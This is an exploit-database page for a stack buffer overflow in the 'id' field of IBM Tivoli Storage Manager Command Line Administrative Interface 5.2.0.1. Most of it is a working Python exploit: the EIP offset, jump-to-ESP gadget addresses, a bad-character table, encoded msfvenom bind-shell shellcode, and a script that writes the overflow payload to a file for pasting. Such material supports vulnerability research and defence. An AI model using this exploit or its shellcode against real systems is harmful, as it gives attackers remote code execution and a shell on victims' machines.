header-logo
Suggest Exploit
vendor:
IBM Tivoli Storage Manager Command Line Administrative Interface
by:
Paolo Stagno aka VoidSec
7.5
CVSS
HIGH
Stack Based Buffer Overflow
CWE
Product Name: IBM Tivoli Storage Manager Command Line Administrative Interface
Affected Version From: 5.2.0.1
Affected Version To: 5.2.0.1
Patch Exists: NO
Related CWE:
CPE: a:ibm:tivoli_storage_manager_command_line_administrative_interface:5.2.0.1
Metasploit:
Other Scripts:
Platforms Tested: Windows 10 Pro v.10.0.19041 Build 19041

IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 – id’ Field Stack Based Buffer Overflow

This exploit targets a stack based buffer overflow vulnerability in the IBM Tivoli Storage Manager Command Line Administrative Interface version 5.2.0.1. By exploiting this vulnerability, an attacker can execute arbitrary code or crash the application. The vulnerability occurs when the 'id' field is not properly validated, allowing the attacker to overflow the buffer and overwrite the EIP register. This exploit provides a step-by-step usage guide and includes the necessary code to trigger the vulnerability.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the IBM Tivoli Storage Manager Command Line Administrative Interface.
Source

Exploit-DB raw data:

# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
# Exploit Author: Paolo Stagno aka VoidSec
# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
# Version: 5.2.0.1
# Tested on: Windows 10 Pro v.10.0.19041 Build 19041

"""
Usage:              IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"

PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1
PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe"                   
FileName         : dsmadmc.exe
ARCH             : I386
DotNET           : False
ASLR             : True
DEP              : True
Authenticode     : False
StrongNaming     : N/A
SafeSEH          : False
ControlFlowGuard : False
HighentropyVA    : False
"""

# [ buffer                              ]
# [ 68 byte | EIP | rest of the buffer  ]
#                   ^_ESP
"""
EIP contains normal pattern : 0x33634132 (offset 68)
ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)

JMP ESP Pointers:
0x028039eb : jmp esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02803d7b : jmp esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 
0x02852c21 : jmp esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fbe3 : call esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fd2f : call esp |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x028823a9 : push esp # ret 0x04 |  {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
"""

#!/usr/bin/python
import struct

# 4000 bytes
buff_max_length=800
eip_offset=68
"""
BAD CHARS:	\x00\x08\x09\x0a\x0d\x1a\x1b\x7f

GOOD CHARS: 
    asciiprint 	\x20-\x7e

MOD CHARS: 
		\x00 -> \x20
       ,-----------------------------------------------.
       | Comparison results:                           |
       |-----------------------------------------------|
       |                        80 81 82 83 84 85 86 87| File
       |                        3f 3f 2c 9f 2c 2e 2b d8| Memory
    80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File
       |5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory
    90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File
       |7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory
    a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File
       |22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory
    b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File
       |2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory
    c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File
       |45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory
    d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File
       |4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory
    e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File
       |8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory
    f0 |f8 f9 fa fb fc fd fe ff                        | File
       |6f 97 a3 96 81 79 5f 98                        | Memory
       `-----------------------------------------------'
"""
# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
shellcode =  b""
shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78"
shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54"
shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f"
shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b"
shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e"
shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30"
shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42"
shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f"
shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54"
shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34"
shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31"
shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61"
shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35"
shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f"
shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39"
shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d"
shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53"
shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b"
shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c"
shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c"
shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53"
shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c"
shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38"
shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58"
shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49"
shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69"
shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b"
shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72"
shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d"
shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c"
shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76"
shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75"
shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31"
shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f"
shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d"
shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77"
shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79"
shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58"
shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33"
shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63"
shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51"
shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58"
shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63"
shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48"
shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54"
shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42"
shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69"
shellcode += b"\x6f\x50\x55\x54\x48\x41\x41"

buff = ""
buff += "A" * eip_offset
buff += struct.pack("<I",0x02c73d7b) #  0x02803d7b cause char modification needs to be written as 0x02c73d7b
buff += shellcode
buff += "C" * (buff_max_length - len(buff))

print("Writing {} bytes".format(len(buff)))
f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w")
f.write(buff)
f.close()

Navigation

Suggest Exploit

Services By CQR